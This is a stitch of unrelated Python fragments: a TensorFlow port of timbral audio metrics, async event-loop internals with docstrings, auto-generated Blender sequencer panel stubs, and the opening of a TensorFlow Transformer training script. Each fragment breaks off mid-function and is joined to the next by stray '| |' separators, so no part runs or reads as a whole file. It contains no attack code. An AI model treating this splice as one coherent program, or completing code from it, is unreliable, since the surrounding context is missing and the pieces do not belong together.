# limit to the centroid crossover frequency
"""
if weighted_mean_normalised_lower_centroid > centroid_crossover_frequency:
limited_weighted_mean_normalised_lower_centroid = np.float64(
centroid_crossover_frequency)
else:
limited_weighted_mean_normalised_lower_centroid = weighted_mean_normalised_lower_centroid
"""
limited_weighted_mean_normalised_lower_centroid = K.clip(
weighted_mean_normalised_lower_centroid, 0., centroid_crossover_frequency)
# TODO :: convert below.
'''
METRIC 2 - weighted mean normalised lower ratio
'''
# define arrays for storing metrics
all_normalised_ratio_tpower = K.sum(spec, axis=2)
lower_power = K.sum(lp_ratio_spec, axis=2)
all_normalised_lower_ratio = tf.where(tf.math.greater(
all_normalised_ratio_tpower, threshold), lower_power/all_normalised_ratio_tpower, 0.)
# calculate
weighted_mean_normalised_lower_ratio = timbral_util.tf_average(
all_normalised_lower_ratio, all_normalised_ratio_tpower, epsilon=None)
'''
METRIC 3 - Approximate duration/decay-time of sample
'''
"""
TODO :: discrepency fromo original implementation to investigate !!
Original ::
all_my_duration = []
# get envelpe of signal
envelope = timbral_util.sample_and_hold_envelope_calculation(
audio_samples, fs)
# estimate onsets
onsets = timbral_util.calculate_onsets(audio_samples, envelope, fs)
# get RMS envelope - better follows decays than the sample-and-hold
rms_step_size = 256
rms_envelope = timbral_util.calculate_rms_enveope(
audio_samples, step_size=rms_step_size)
# convert decay threshold to magnitude
decay_threshold = timbral_util.db2mag(db_decay_threshold)
# rescale onsets to rms stepsize - casting to int
time_convert = fs / float(rms_step_size)
onsets = (np.array(onsets) / float(rms_step_size)).astype('int')
onsets = [0]
for idx, onset in enumerate(onsets):
# NOTE :: simplification
segment = rms_envelope
# get location of max RMS frame
max_idx = np.argmax(segment)
# get the segment from this max until the next onset
post_max_segment = segment[max_idx:]
# estimate duration based on decay or until next onset
if min(post_max_segment) >= decay_threshold:
my_duration = len(post_max_segment) / time_convert
else:
my_duration = np.where(post_max_segment < decay_threshold)[
0][0] / time_convert
# append to array
all_my_duration.append(my_duration)
# calculate the lof of mean duration
mean_my_duration = np.log10(np.mean(all_my_duration))
"""
onsets = b * [0]
all_my_duration_array = []
decay_threshold = timbral_util.db2mag(db_decay_threshold)
for i in range(b):
all_my_duration = []
# get RMS envelope - better follows decays than the sample-and-hold
rms_step_size = 256
segment = tf.numpy_function(
timbral_util.calculate_rms_enveope, [audio_samples[i], rms_step_size, 256, True], [audio_samples.dtype], name='tf_rms_envelope')
# rms_envelope is float64
# convert decay threshold to magnitude
# rescale onsets to rms stepsize - casting to int
time_convert = fs / float(rms_step_size)
# onsets = (np.array(onsets) / float(rms_step_size)).astype('int')
# assumes there is only one onset
# onset = 0, idx = 0
# segment = np.array(rms_envelope)
# get location of max RMS frame
max_idx = np.argmax(segment)
# get the segment from this max until the next onset
post_max_segment = segment[max_idx:]
# estimate duration based on decay or until next onset
# my_duration = len(post_max_segment) / time_convert
# my_duration = len(post_max_segment) / time_convert
shape = tf.cast(K.sum(tf.shape(post_max_segment)), audio_samples.dtype)
# TODO :: find efficient way to make this condition work
my_duration = shape / time_convert
"""
if min(post_max_segment) >= decay_threshold:
my_duration = len(post_max_segment) / time_convert
else:
my_duration = np.where(post_max_segment < decay_threshold)[
0][0] / time_convert
"""
# append to array
all_my_duration.append(my_duration)
all_my_duration_array.append(all_my_duration)
all_my_duration = tf.cast(
tf.stack(all_my_duration_array), audio_samples.dtype)
# calculate the lof of mean duration
mean_my_duration = timbral_util.tf_log10(
K.mean(all_my_duration, axis=-1))
'''
METRIC 4 - f0 estimation with peak pickingZ
# Original
all_spectrum = np.sum(spec, axis=1)
# normalise this
norm_spec = (all_spectrum - np.min(all_spectrum)) / \
(np.max(all_spectrum) - np.min(all_spectrum))
# set limit for peak picking
cthr = 0.01
# detect peaks
peak_idx, peak_value, peak_freq = timbral_util.detect_peaks(norm_spec, cthr=cthr, unprocessed_array=norm_spec,
freq=freq)
# estimate peak
pitch_estimate = np.log10(min(peak_freq)) if peak_freq[0] > 0 else 0
'''
# get the overall spectrum
all_spectrum = K.sum(spec, axis=1) # norm_spec ::(1,2049)
# normalise this
"""
norm_spec:: (2049)
norm_spec = (all_spectrum - np.min(all_spectrum)) / \
(np.max(all_spectrum) - np.min(all_spectrum))
"""
b_norm = K.max(all_spectrum, axis=-1, keepdims=True) - \
K.min(all_spectrum, axis=-1, keepdims=True)
norm_spec = (all_spectrum - K.min(all_spectrum,
axis=-1, keepdims=True)) / b_norm
# set limit for peak picking
cthr = 0.01
"""
peak_idx, _, peak_x = tf.numpy_function(timbral_util.detect_peaks, [
spec, freq, 0.2, spec, fs], [tf.int64, tf.float64, tf.float64])
(array, freq=0, cthr=0.2, unprocessed_array=False, fs=44100):
"""
# detect peaks
pitch_estimate_array = []
for i in range(b):
_, _, peak_freq = tf.numpy_function(
timbral_util.detect_peaks, [norm_spec[i], freq, cthr, norm_spec[i], fs], [tf.int64, tf.float64, tf.float64], name='detect_peaks')
# estimate peak
if peak_freq[0] > 0:
pitch_estimate = timbral_util.tf_log10(
K.min(peak_freq), peak_freq.dtype)
else:
pitch_estimate = tf.cast(0, peak_freq.dtype)
pitch_estimate_array.append(
tf.cast(pitch_estimate, audio_samples.dtype))
pitch_estimate = tf.stack(pitch_estimate_array)
# get outputs
if dev_output:
return limited_weighted_mean_normalised_lower_centroid, weighted_mean_normalised_lower_ratio, mean_my_duration, \
pitch_estimate, weighted_mean_normalised_lower_ratio * mean_my_duration, \
timbral_util.sigmoid(
weighted_mean_normalised_lower_ratio) * mean_my_duration
else:
'''
Perform linear regression to obtain depth
'''
# coefficients from linear regression
# | |
before : `None`, `str`, `list` of `str` = `None`, Optional
Any content, what should go before the exception's traceback.
If given as `str`, or if `list`, then the last element of it should end with linebreak.
after : `None`, `str`, `list` of `str` = `None`, Optional
Any content, what should go after the exception's traceback.
If given as `str`, or if `list`, then the last element of it should end with linebreak.
file : `None`, `I/O stream` = `None`, Optional
The file to print the stack to. Defaults to `sys.stderr`.
Returns
-------
future : ``Future``
Returns a future, what can be awaited to wait for the rendering to be done.
""")
if DOCS_ENABLED:
render_exception_maybe_async.__doc__ = (
"""
Renders the given exception's traceback. If called from an ``EventThread``, then will not block it.
This method is called from function or methods, where being on an ``EventThread`` is not guaranteed.
Parameters
----------
exception : ``BaseException``
The exception to render.
before : `None`, `str`, `list` of `str` = `None`, Optional
Any content, what should go before the exception's traceback.
If given as `str`, or if `list`, then the last element of it should end with linebreak.
after : `None`, `str`, `list` of `str` = `None`, Optional
Any content, what should go after the exception's traceback.
If given as `str`, or if `list`, then the last element of it should end with linebreak.
file : `None`, `I/O stream` = `None`, Optional
The file to print the stack to. Defaults to `sys.stderr`.
""")
@staticmethod
def _render_exception_sync(exception, before, after, file):
"""
Renders the given exception in a blocking way.
Parameters
----------
exception : ``BaseException``
The exception to render.
before : `str`, `list` of `str`
Any content, what should go before the exception's traceback.
If given as `str`, or if `list`, then the last element of it should end with linebreak.
after : `str`, `list` of `str`
Any content, what should go after the exception's traceback.
If given as `str`, or if `list`, then the last element of it should end with linebreak.
file : `None`, `I/O stream`
The file to print the stack to. Defaults to `sys.stderr`.
"""
extracted = []
if before is None:
pass
elif isinstance(before, str):
extracted.append(before)
elif isinstance(before, list):
for element in before:
if type(element) is str:
extracted.append(element)
else:
extracted.append(repr(element))
extracted.append('\n')
else:
# ignore exception cases
extracted.append(repr(before))
extracted.append('\n')
render_exception_into(exception, extend=extracted)
if after is None:
pass
elif isinstance(after, str):
extracted.append(after)
elif isinstance(after, list):
for element in after:
if type(element) is str:
extracted.append(element)
else:
extracted.append(repr(element))
extracted.append('\n')
else:
extracted.append(repr(after))
extracted.append('\n')
if file is None:
# ignore exception cases
file = sys.stderr
file.write(''.join(extracted))
def stop(self):
"""
Stops the event loop. Thread safe.
"""
if self.should_run:
if current_thread() is self:
self._stop()
else:
self.call_soon(self._stop)
self.wake_up()
def _stop(self):
"""
Stops the event loop. Internal function of ``.stop``, called or queued up by it.
Should be called only from the thread of the event loop.
"""
self.release_executors()
self.should_run = False
async def shutdown_async_generators(self):
"""
Shuts down the asynchronous generators running on the event loop.
This method is a coroutine.
"""
self._async_generators_shutdown_called = True
async_generators = self._async_generators
if async_generators:
return
closing_async_generators = list(async_generators)
async_generators.clear()
results = await Gatherer(self, (ag.aclose() for ag in closing_async_generators))
for result, async_generator in zip(results, closing_async_generators):
exception = result.exception
if (exception is not None) and (type(exception) is not CancelledError):
extracted = [
'Exception occurred during shutting down async generator:\n',
repr(async_generator),
]
render_exception_into(exception, extend=extracted)
sys.stderr.write(''.join(extracted))
def get_tasks(self):
"""
Collects all the scheduled tasks and returns them.
Returns
-------
tasks : `list` of ``Task``
"""
future_checks_pending = set()
# Collect all futures
task = self.current_task
if (task is not None):
future_checks_pending.add(task)
for handle in chain(self._ready, self._scheduled):
func = handle.func
if isinstance(func, MethodType):
maybe_future = func.__self__
if isinstance(maybe_future, Future):
future_checks_pending.add(maybe_future)
elif isinstance(func, Future):
future_checks_pending.add(func)
args = handle.args
if (args is not None):
for parameter in args:
if isinstance(parameter, MethodType):
maybe_future = parameter.__self__
if isinstance(maybe_future, Future):
future_checks_pending.add(maybe_future)
elif isinstance(parameter, Future):
future_checks_pending.add(parameter)
# Check callbacks
future_checks_done = set()
while future_checks_pending:
future = future_checks_pending.pop()
future_checks_done.add(future)
for callback in future._callbacks:
if isinstance(callback, MethodType):
maybe_future = callback.__self__
if isinstance(maybe_future, Future):
if (maybe_future not in future_checks_done):
future_checks_pending.add(maybe_future)
elif isinstance(callback, Future):
if (callback not in future_checks_done):
future_checks_pending.add(callback)
# select tasks
return [future for future in future_checks_done if isinstance(future, Task)]
def _make_socket_transport(self, socket, protocol, waiter=None, *, extra=None, server=None):
"""
Creates a socket transport with the given parameters.
Parameters
----------
socket : `socket.socket`
The socket, what the transport will use.
protocol : ``AbstractProtocolBase``
The protocol of the transport.
waiter : `None`, ``Future`` = `None`, Optional
Waiter, what's result should be set, when the transport is ready to use.
extra : `None`, `dict` of (`str`, `Any`) item = `None`, Optional (Keyword only)
Optional transport information.
server : `None`, ``Server`` = `None`, Optional (Keyword only)
The server to what the created socket will be attached to.
Returns
-------
transport : ``SocketTransportLayer``
"""
return SocketTransportLayer(self, extra, socket, protocol, waiter, server)
def _make_ssl_transport(self, socket, protocol, ssl, waiter=None, *, server_side=False, server_host_name=None,
extra=None, server=None):
"""
Creates an ssl transport with the given parameters.
Parameters
----------
socket : `socket.socket`
The socket, what the transport will use.
protocol : ``AbstractProtocolBase``
Asynchronous protocol implementation for the transport. The given protocol is wrapped into an
``SSLBidirectionalTransportLayer``
ssl : `SSLContext`
Ssl context of the respective connection.
waiter : `None`, ``Future`` = `None`, Optional
Waiter, what's result should be set, when the transport is ready to use.
server_side : `bool` = `False`, Optional (Keyword only)
Whether the created ssl transport is a server side.
server_host_name : `None`, `str` = `None`, Optional (Keyword only)
Overwrites the hostname that the target server’s certificate will be matched against.
By default the value of the host parameter is used. If host is empty, there is no default and you must pass
a value for `server_host_name`. If `server_host_name` is an empty string, hostname matching is disabled
(which is a serious security risk, allowing for potential man-in-the-middle attacks).
extra : `None`, `dict` of (`str`, `Any`) items = `None`, Optional (Keyword only)
Optional transport information.
server : `None`, ``Server`` = `None`, Optional (Keyword only)
The server to what the created socket will be attached to.
Returns
-------
transport : ``SSLBidirectionalTransportLayerTransport``
The created ssl transport.
"""
ssl_transport = SSLBidirectionalTransportLayer(self, protocol, ssl, waiter, server_side, server_host_name, True)
SocketTransportLayer(self, extra, socket, ssl_transport, None, server)
return ssl_transport
def empty_self_socket(self):
"""
Reads all the data out from self socket.
Familiar to async-io event loop's `._read_from_self`.
"""
while True:
try:
data = self._self_read_socket.recv(4096)
if not data:
break
except InterruptedError:
continue
except BlockingIOError:
break
def wake_up(self):
"""
Wakes up the event loop. Thread safe.
Familiar as async-io event loop's `._write_to_self`.
"""
self_write_socket = self._self_write_socket
if self_write_socket is None:
if self.running:
return
# If we start it not needed to wake_up. If we don't, we wont wake_up anyway.
self._maybe_start()
return
try:
self_write_socket.send(b'\0')
except OSError:
pass
def _start_serving(self, protocol_factory, socket, ssl, server, backlog):
"""
Starts serving the given socket on the event loop. Called by ``Server.start``. Adds a reader callback for the
socket, what will call ``._accept_connection``. (At edge cases ``._accept_connection`` might call this
method as well for repeating itself after a a delay.)
Parameters
----------
protocol_factory : `callable`
Factory function for creating an asynchronous compatible protocol.
socket : `socket.socket`
The sockets to serve by the respective server if applicable.
ssl : `None`, `SSLContext`
To enable ssl for the connections, give it as `SSLContext`.
server : `None`, ``Server``
The respective server, what started to serve if applicable.
backlog : `int`
The maximum number of queued | |
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def has_sequencer(self, context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class SEQUENCER_PT_adjust_comp(SequencerButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def has_sequencer(self, context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class SEQUENCER_PT_adjust_crop(SequencerButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def has_sequencer(self, context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class SEQUENCER_PT_adjust_sound(SequencerButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def has_sequencer(self, context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class SEQUENCER_PT_adjust_transform(SequencerButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def has_sequencer(self, context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class SEQUENCER_PT_adjust_video(SequencerButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_options = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
pass
def bl_rna_get_subclass_py(self):
'''
'''
pass
def draw(self, context):
'''
'''
pass
def driver_add(self):
'''
'''
pass
def driver_remove(self):
'''
'''
pass
def get(self):
'''
'''
pass
def has_sequencer(self, context):
'''
'''
pass
def is_extended(self):
'''
'''
pass
def is_property_hidden(self):
'''
'''
pass
def is_property_overridable_library(self):
'''
'''
pass
def is_property_readonly(self):
'''
'''
pass
def is_property_set(self):
'''
'''
pass
def items(self):
'''
'''
pass
def keyframe_delete(self):
'''
'''
pass
def keyframe_insert(self):
'''
'''
pass
def keys(self):
'''
'''
pass
def path_from_id(self):
'''
'''
pass
def path_resolve(self):
'''
'''
pass
def poll(self, context):
'''
'''
pass
def pop(self):
'''
'''
pass
def prepend(self, draw_func):
'''
'''
pass
def property_overridable_library_set(self):
'''
'''
pass
def property_unset(self):
'''
'''
pass
def remove(self, draw_func):
'''
'''
pass
def type_recast(self):
'''
'''
pass
def values(self):
'''
'''
pass
class SEQUENCER_PT_cache_settings(SequencerButtonsPanel, bpy_types.Panel,
bpy_types._GenericUI):
bl_category = None
''' '''
bl_label = None
''' '''
bl_region_type = None
''' '''
bl_rna = None
''' '''
bl_space_type = None
''' '''
id_data = None
''' '''
def append(self, draw_func):
'''
'''
pass
def as_pointer(self):
'''
'''
pass
def bl_rna_get_subclass(self):
'''
'''
| |
<reponame>formatechnologies/models
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Train and evaluate the Transformer model.
See README for description of setting the training schedule and evaluating the
BLEU score.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import tempfile
from absl import app
from absl import flags
from absl import logging
import tensorflow as tf
from tensorflow.python.util import object_identity
# pylint: disable=g-bad-import-order
from official.transformer import compute_bleu
from official.transformer.utils import tokenizer
from official.transformer.v2 import data_pipeline
from official.transformer.v2 import metrics
from official.transformer.v2 import misc
from official.transformer.v2 import optimizer
from official.transformer.v2 import transformer
from official.transformer.v2 import translate
from official.utils.flags import core as flags_core
from official.utils.logs import logger
from official.utils.misc import keras_utils
from official.utils.misc import distribution_utils
INF = int(1e9)
BLEU_DIR = "bleu"
_SINGLE_SAMPLE = 1
def translate_and_compute_bleu(model,
params,
subtokenizer,
bleu_source,
bleu_ref,
distribution_strategy=None):
"""Translate file and report the cased and uncased bleu scores.
Args:
model: A Keras model, used to generate the translations.
params: A dictionary, containing the translation related parameters.
subtokenizer: A subtokenizer object, used for encoding and decoding source
and translated lines.
bleu_source: A file containing source sentences for translation.
bleu_ref: A file containing the reference for the translated sentences.
distribution_strategy: A platform distribution strategy, used for TPU based
translation.
Returns:
uncased_score: A float, the case insensitive BLEU score.
cased_score: A float, the case sensitive BLEU score.
"""
# Create temporary file to store translation.
tmp = tempfile.NamedTemporaryFile(delete=False)
tmp_filename = tmp.name
translate.translate_file(
model,
params,
subtokenizer,
bleu_source,
output_file=tmp_filename,
print_all_translations=False,
distribution_strategy=distribution_strategy)
# Compute uncased and cased bleu scores.
uncased_score = compute_bleu.bleu_wrapper(bleu_ref, tmp_filename, False)
cased_score = compute_bleu.bleu_wrapper(bleu_ref, tmp_filename, True)
os.remove(tmp_filename)
return uncased_score, cased_score
def evaluate_and_log_bleu(model,
params,
bleu_source,
bleu_ref,
vocab_file,
distribution_strategy=None):
"""Calculate and record the BLEU score.
Args:
model: A Keras model, used to generate the translations.
params: A dictionary, containing the translation related parameters.
bleu_source: A file containing source sentences for translation.
bleu_ref: A file containing the reference for the translated sentences.
vocab_file: A file containing the vocabulary for translation.
distribution_strategy: A platform distribution strategy, used for TPU based
translation.
Returns:
uncased_score: A float, the case insensitive BLEU score.
cased_score: A float, the case sensitive BLEU score.
"""
subtokenizer = tokenizer.Subtokenizer(vocab_file)
uncased_score, cased_score = translate_and_compute_bleu(
model, params, subtokenizer, bleu_source, bleu_ref, distribution_strategy)
logging.info("Bleu score (uncased): %s", uncased_score)
logging.info("Bleu score (cased): %s", cased_score)
return uncased_score, cased_score
class TransformerTask(object):
"""Main entry of Transformer model."""
def __init__(self, flags_obj):
"""Init function of TransformerMain.
Args:
flags_obj: Object containing parsed flag values, i.e., FLAGS.
Raises:
ValueError: if not using static batch for input data on TPU.
"""
self.flags_obj = flags_obj
self.predict_model = None
# Add flag-defined parameters to params object
num_gpus = flags_core.get_num_gpus(flags_obj)
self.params = params = misc.get_model_params(flags_obj.param_set, num_gpus)
params["num_gpus"] = num_gpus
params["use_ctl"] = flags_obj.use_ctl
params["is_tpu_pod"] = flags_obj.is_tpu_pod
params["data_dir"] = flags_obj.data_dir
params["model_dir"] = flags_obj.model_dir
params["static_batch"] = flags_obj.static_batch
params["max_length"] = flags_obj.max_length
params["decode_batch_size"] = flags_obj.decode_batch_size
params["decode_max_length"] = flags_obj.decode_max_length
params["padded_decode"] = flags_obj.padded_decode
params["num_parallel_calls"] = (
flags_obj.num_parallel_calls or tf.data.experimental.AUTOTUNE)
params["use_synthetic_data"] = flags_obj.use_synthetic_data
params["batch_size"] = flags_obj.batch_size or params["default_batch_size"]
params["repeat_dataset"] = None
params["dtype"] = flags_core.get_tf_dtype(flags_obj)
params["enable_metrics_in_training"] = flags_obj.enable_metrics_in_training
if params["dtype"] == tf.float16:
# TODO(reedwm): It's pretty ugly to set the global policy in a constructor
# like this. What if multiple instances of TransformerTask are created?
# We should have a better way in the tf.keras.mixed_precision API of doing
# this.
loss_scale = flags_core.get_loss_scale(flags_obj,
default_for_fp16="dynamic")
policy = tf.keras.mixed_precision.experimental.Policy(
"mixed_float16", loss_scale=loss_scale)
tf.keras.mixed_precision.experimental.set_policy(policy)
self.distribution_strategy = distribution_utils.get_distribution_strategy(
distribution_strategy=flags_obj.distribution_strategy,
num_gpus=num_gpus,
tpu_address=flags_obj.tpu or "")
if self.use_tpu:
params["num_replicas"] = self.distribution_strategy.num_replicas_in_sync
if not params["static_batch"]:
raise ValueError("TPU requires static batch for input data.")
else:
print("Running transformer with num_gpus =", num_gpus)
if self.distribution_strategy:
print("For training, using distribution strategy: ",
self.distribution_strategy)
else:
print("Not using any distribution strategy.")
@property
def use_tpu(self):
if self.distribution_strategy:
return isinstance(self.distribution_strategy,
tf.distribute.experimental.TPUStrategy)
return False
def train(self):
"""Trains the model."""
params = self.params
flags_obj = self.flags_obj
# Sets config options.
keras_utils.set_session_config(
enable_xla=flags_obj.enable_xla)
_ensure_dir(flags_obj.model_dir)
with distribution_utils.get_strategy_scope(self.distribution_strategy):
model = transformer.create_model(params, is_train=True)
opt = self._create_optimizer()
if params["use_ctl"]:
train_loss_metric = tf.keras.metrics.Mean(
"training_loss", dtype=tf.float32)
else:
model.compile(opt)
model.summary()
if self.use_tpu:
# Different from experimental_distribute_dataset,
# experimental_distribute_datasets_from_function requires
# per-replica/local batch size.
params["batch_size"] /= self.distribution_strategy.num_replicas_in_sync
train_ds = (
self.distribution_strategy
.experimental_distribute_datasets_from_function(
lambda ctx: data_pipeline.train_input_fn(params)))
else:
train_ds = data_pipeline.train_input_fn(params)
map_data_fn = data_pipeline.map_data_for_transformer_fn
train_ds = train_ds.map(
map_data_fn, num_parallel_calls=params["num_parallel_calls"])
if params["use_ctl"]:
train_ds_iterator = iter(train_ds)
callbacks = self._create_callbacks(flags_obj.model_dir, 0, params)
# TODO(b/139418525): Refactor the custom training loop logic.
@tf.function
def train_steps(iterator, steps):
"""Training steps function for TPU runs.
Args:
iterator: The input iterator of the training dataset.
steps: An integer, the number of training steps.
Returns:
A float, the loss value.
"""
def _step_fn(inputs):
"""Per-replica step function."""
inputs, targets = inputs
with tf.GradientTape() as tape:
logits = model([inputs, targets], training=True)
loss = metrics.transformer_loss(logits, targets,
params["label_smoothing"],
params["vocab_size"])
# Scales the loss, which results in using the average loss across all
# of the replicas for backprop.
scaled_loss = loss / self.distribution_strategy.num_replicas_in_sync
# De-dupes variables due to keras tracking issues.
tvars = list(
object_identity.ObjectIdentitySet(model.trainable_variables))
grads = tape.gradient(scaled_loss, tvars)
opt.apply_gradients(zip(grads, tvars))
# For reporting, the metric takes the mean of losses.
train_loss_metric.update_state(loss)
for _ in tf.range(steps):
train_loss_metric.reset_states()
self.distribution_strategy.experimental_run_v2(
_step_fn, args=(next(iterator),))
if self.use_tpu:
checkpoint = tf.train.Checkpoint(model=model, optimizer=opt)
latest_checkpoint = tf.train.latest_checkpoint(flags_obj.model_dir)
if latest_checkpoint:
checkpoint.restore(latest_checkpoint)
logging.info("Loaded checkpoint %s", latest_checkpoint)
if flags_obj.train_steps < flags_obj.steps_between_evals:
flags_obj.steps_between_evals = flags_obj.train_steps
iterations = flags_obj.train_steps // flags_obj.steps_between_evals
cased_score, uncased_score = None, None
cased_score_history, uncased_score_history = [], []
for i in range(1, iterations + 1):
print("Start train iteration:{}/{}".format(i, iterations))
history = None
if params["use_ctl"]:
if not self.use_tpu:
raise NotImplementedError(
"Custom training loop on GPUs is not implemented.")
train_steps_per_eval = tf.convert_to_tensor(
flags_obj.steps_between_evals, dtype=tf.int32)
# Runs training steps.
train_steps(train_ds_iterator, train_steps_per_eval)
train_loss = train_loss_metric.result().numpy().astype(float)
logging.info("Train Step: %d/%d / loss = %s",
i * flags_obj.steps_between_evals, flags_obj.train_steps,
train_loss)
checkpoint_name = checkpoint.save(
os.path.join(
flags_obj.model_dir,
"ctl_step_{}.ckpt".format(i * flags_obj.steps_between_evals)))
logging.info("Saved checkpoint to %s", checkpoint_name)
else:
if self.use_tpu:
raise NotImplementedError(
"Keras model.fit on TPUs is not implemented.")
history = model.fit(
train_ds,
initial_epoch=i - 1,
epochs=i,
steps_per_epoch=flags_obj.steps_between_evals,
callbacks=callbacks,
# If TimeHistory is enabled, progress bar would be messy. Increase
# the verbose level to get rid of it.
verbose=(2 if flags_obj.enable_time_history else 1))
